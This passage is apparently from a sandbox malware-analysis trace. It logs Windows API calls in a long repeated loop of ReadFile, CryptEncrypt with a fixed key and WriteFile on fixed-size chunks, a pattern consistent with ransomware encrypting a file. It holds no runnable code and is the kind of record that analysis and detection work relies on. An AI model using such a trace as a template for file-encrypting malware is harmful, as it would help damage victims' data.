pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.489] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.489] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.489] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.489] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.489] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.489] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.489] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.490] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.490] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.490] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.490] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.490] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.490] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.490] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.490] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.490] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.490] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.491] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.491] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.491] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.491] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.491] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.491] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.491] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.491] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.492] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.492] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.492] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.492] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.492] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.492] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.492] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.492] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.492] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.492] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.493] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.493] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.493] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.493] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.493] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.493] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.493] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.493] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.493] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.493] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.494] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.494] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.494] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.494] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.494] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.494] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.494] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.494] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.494] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.494] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.494] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.494] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.494] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.494] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.495] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.495] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.495] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.495] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.495] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.495] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.495] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.495] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.495] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.495] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.495] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.495] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.495] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.495] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.496] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.496] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.496] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.496] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.496] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, 